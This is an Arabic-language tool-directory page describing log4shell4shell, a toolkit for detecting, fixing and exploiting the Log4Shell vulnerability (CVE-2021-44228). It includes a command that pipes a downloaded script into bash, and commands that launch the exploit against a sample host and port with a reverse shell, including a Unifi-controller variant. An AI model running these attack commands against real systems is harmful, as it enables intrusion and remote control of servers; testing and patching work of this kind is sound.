Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4shell4shell — Log4shell - مجموعة أدوات متعددة. اكتشف، وأصلح، واختبر الثغرات المحتملة لـ CVE-2021-44228 - يوفر بيئة اختبار/هجوم كاملة لـ LOG4SHELL على الشل | Kitploit
أدوات/GitHubGitHub/suuhm/log4shell4shell
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubsuuhm/log4shell4shell

log4shell4shell

Log4shell - مجموعة أدوات متعددة. اكتشف، وأصلح، واختبر الثغرات المحتملة لـ CVE-2021-44228 - يوفر بيئة اختبار/هجوم كاملة لـ LOG4SHELL على الشل

عرض المستودع
5منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

log4shell4shell

Log4j - أداة متعددة الاستخدامات. ابحث عن ثغرات CVE-2021-44228 المحتملة وأصلحها - توفر بيئة اختبار/هجوم LOG4SHELL كاملة

Thumb

الميزات

  • افحص نظام Linux/Mac/BSD وWindows لديك بحثًا عن ثغرات CVE-2021-44228
  • أصلح نظامك عن طريق حذف فئة جافا log4j / أو تعيين بعض متغيرات البيئة
  • إثبات المفهوم: يمكنك تشغيل خادم Spring Boot تجريبي لاختبار الاستغلال بنفسك (https://github.com/christophetd/log4shell-vulnerable-app)
  • يمكنك تشغيل هجوم ضد عنوان IP-Port مرغوب وتضمين أمر Base64 / أو شل عكسي بسيط
  • فحص كامل لنطاق IP عبر https://github.com/fullhunt/log4j-scan

كيفية التشغيل على Linux/Mac/BSD:

المتطلبات:

  • https://docs.docker.com/get-docker/
  • Debian / Ubuntu: apt update ; apt install default-jre screen python3-pip bash curl
  • OpenSuse: zypper ref ; zypper in default-jre screen python3-pip bash curl
  • Redhead-Linux / CentOS: yum clean; yum install default-jre screen python3-pip bash curl
  • BSD pkg: pkg install default-jre screen python3-pip curl
  • Mac OS (Brew): /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pip

فحص سريع لنظامك باستخدام هذا السطر الواحد:

root@kitploit:~
wget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system

المزيد من الخيارات

تشغيل هجوم تجريبي ضد IP: 10.4.4.20 المنفذ 8080 صفحة تسجيل الدخول وإضافة شل عكسي عبر وكيل:

root@kitploit:~
git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e

شغّل screen -r l4s4s-ldap-srv و/أو screen -r l4s4s-nc-rsh لعرض بعض معلومات الهجوم في شل خادم الاستغلال:

تشغيل فحص كامل IP: 10.4.4.20 المنفذ 8080 مع محاولة جميع الاختبارات:

root@kitploit:~
./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"

تشغيل إثبات مفهوم على خادم Tomcat Springboot:

root@kitploit:~
./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e

تشغيل هجوم/فحص استغلال Unifi-Controller (على 10.4.4.20:8443):

root@kitploit:~
./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post

جميع الخيارات المتاحة

root@kitploit:~
_|                            _|  _|              _|                  _|  _|  _|  _|              _|                  _|  _|
_|          _|_|      _|_|_|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|
_|        _|    _|  _|    _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|
_|        _|    _|  _|    _|      _|        _|_|  _|    _|  _|        _|  _|      _|        _|_|  _|    _|  _|        _|  _|
_|_|_|_|    _|_|      _|_|_|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|
                          _|
                      _|_|


 > Running Log4shell Framework & Check-Toolkit on shell v0.1a (C) 2021 suuhm

Wrong input! Please enter one of these options:

Usage: ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>

                        --get-powershell-finder
                        --check-system
                        --fix-log4j
                        --run-dummy-server <JNDIExploit.*.zip>
                        --run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
                        --python-scan <command>

كيفية ترقية إصدار بايثون على لينكس و/أو ماك:

فقط قم بتشغيل السكريبت المساعد الخاص بي (--list-versions): ./python-upgrader.sh

كيفية التشغيل على Windows x86 / x64:

فقط قم بتشغيله في Powershell (بصلاحية المسؤول): .\set_windows_fix.ps1

هذا السكريبت ألفا! لذا يرجى إخباري إذا واجهت أي مشاكل

إخلاء المسؤولية القانوني

مشروع log4shell4shell أُنشئ لأغراض تعليمية واختبارات أخلاقية فقط. استخدام log4j-scan لمهاجمة أهداف دون موافقة مسبقة متبادلة غير قانوني. تقع مسؤولية الامتثال لجميع القوانين المحلية والولائية والفيدرالية المعمول بها على عاتق المستخدم النهائي. يخلي المطورون مسؤوليتهم ولا يتحملون أي مسؤولية عن أي إساءة استخدام أو ضرر ناجم عن هذا البرنامج.

تنزيل الأداة